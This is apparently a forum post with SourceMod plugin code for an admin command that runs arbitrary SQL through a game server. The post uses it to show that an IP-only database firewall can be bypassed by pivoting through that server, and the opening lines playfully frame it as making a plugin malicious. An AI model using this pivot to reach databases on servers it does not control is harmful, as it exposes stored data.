You want your plugin to become Malicious? You want anyone to gain access over everything? SQL server firewall'ed? No Problem! Introducing all new!
So what this kinda shows is how a CS:GO server can be used as a VPN into a SQL server. Some SQL servers have a firewall that only allows inbound connections from a CS:GO server, but this shows you how to manipulate it.
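So - at the end of the day - be very aware of who you give access to on your servers, and what you give them. The SQL firewall only checks where a connection comes from, so anything that can run code or commands on the game server gets the same database access the server itself has. There could theoretically be a way to actually leave the confinement of the CS:GO server and access the whole VPS / Dedi entirely, but I haven't got up to that yet : ^)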
Note: PrintToConsole has a limit on how much it can print, I could have it push to a stack and print a few at a time until it's all printed, but you can figure that one out : ^)
Some notable commands:
Code:
sm_test "example" "show tables;"
sm_test "example" "desc a_table_name;"
sm_test "example" "INSERT INTO exampe_example VALUES ('STEAM_1:1:1111', 100, 0.1, 'more text');"
PHP Code:
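/**
 * Console-command callback: connects to the database configuration named in
 * argument 1 and queues argument 2 on it as a threaded SQL query, with the
 * result delivered to sqlTest.
 *
 * Security: the statement is executed exactly as the caller typed it, using
 * whatever privileges the named configuration gives the game server. The
 * database only sees a connection from the game server's address, so a
 * source-IP firewall in front of it does not distinguish this from normal
 * plugin traffic. For that reason the command is limited to root admins
 * here and every use is written to the admin log.
 *
 * @param I_Client  Index of the client that issued the command.
 * @param I_Args    Number of arguments supplied with the command.
 * @return          Plugin_Handled in every case.
 */
public Action command_test(int I_Client, int I_Args) {
    // The command registration is not part of this listing, so access is
    // enforced here instead of relying on how the command was registered.
    // NOTE(review): "sm_test" is taken from the usage examples - confirm it
    // matches the registered command name so admin overrides apply.
    if (!CheckCommandAccess(I_Client, "sm_test", ADMFLAG_ROOT)) {
        ReplyToCommand(I_Client, "You do not have access to this command");
        return Plugin_Handled;
    }

    // Both the configuration name and the statement are required; without
    // this check an empty statement would be sent to the database.
    if (I_Args < 2) {
        ReplyToCommand(I_Client, "Usage: sm_test <config> <statement>");
        return Plugin_Handled;
    }

    char C_Server[64], C_Statement[512], C_Error[512];
    GetCmdArg(1, C_Server, sizeof(C_Server));
    GetCmdArg(2, C_Statement, sizeof(C_Statement));

    // Audit trail: record who ran which statement against which configuration
    // before anything is sent to the database.
    LogAction(I_Client, -1, "\"%L\" ran sm_test on \"%s\": %s", I_Client, C_Server, C_Statement);

    // NOTE(review): the Database handle opened here is never closed in this
    // listing - confirm the intended lifetime and release it once the query
    // has been queued or completed.
    Database New = SQL_Connect(C_Server, true, C_Error, sizeof(C_Error));
    if (New != INVALID_HANDLE) {
        PrintToChat(I_Client, "Connection To %s Successful", C_Server);
        // The user id (not the client index) is passed so the callback can
        // detect that the player left while the query was running.
        SQL_TQuery(New, sqlTest, C_Statement, GetClientUserId(I_Client), DBPrio_High);
        PrintToChat(I_Client, "Executing: %s", C_Statement);
    } else {
        PrintToChat(I_Client, "Error: %s", C_Error);
    }
    return Plugin_Handled;
}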
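/**
 * Threaded-query callback for command_test: prints the column names and
 * every row of the result set to the requesting client's console, or the
 * driver's error text to their chat when the query failed.
 *
 * @param owner     Database handle the query ran on (unused here).
 * @param hndl      Query result handle, or INVALID_HANDLE on failure.
 * @param error     Error text supplied by the driver on failure.
 * @param I_UserID  User id of the client that issued the command.
 */
public void sqlTest(Handle owner, Handle hndl, char[] error, int I_UserID) {
    char C_buffer[512], C_String[512], C_FieldName[64];

    // GetClientOfUserId returns 0 when the player has disconnected in the
    // meantime; index 0 must not be passed to IsClientInGame.
    int I_Client = GetClientOfUserId(I_UserID);
    if (I_Client <= 0 || !IsClientInGame(I_Client)) {
        return;
    }

    if (hndl == INVALID_HANDLE) {
        // The error text comes from the database driver, so it is passed as
        // data rather than used as the format string.
        PrintToChat(I_Client, "%s", error);
        return;
    }

    PrintToChat(I_Client, "Executed");
    if (SQL_GetRowCount(hndl) <= 0) {
        return;
    }

    // Header line: every column name followed by ": ".
    int I_Fields = SQL_GetFieldCount(hndl);
    for (int i = 0; i < I_Fields; i++) {
        SQL_FieldNumToName(hndl, i, C_FieldName, sizeof(C_FieldName));
        Format(C_buffer, sizeof(C_buffer), "%s%s: ", C_buffer, C_FieldName);
    }
    // Column names and cell values are database content and may contain '%',
    // so they are always printed through an explicit "%s".
    PrintToConsole(I_Client, "%s", C_buffer);
    Format(C_buffer, sizeof(C_buffer), "");

    // One console line per row, cells separated by ", ". Each cell and each
    // line is capped at the 512-byte buffers above, so long values are cut.
    while (SQL_FetchRow(hndl)) {
        for (int i = 0; i < I_Fields; i++) {
            SQL_FetchString(hndl, i, C_String, sizeof(C_String));
            Format(C_buffer, sizeof(C_buffer), "%s%s, ", C_buffer, C_String);
        }
        PrintToConsole(I_Client, "%s", C_buffer);
        Format(C_buffer, sizeof(C_buffer), "");
    }
}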
Example Taken From TangoTimer: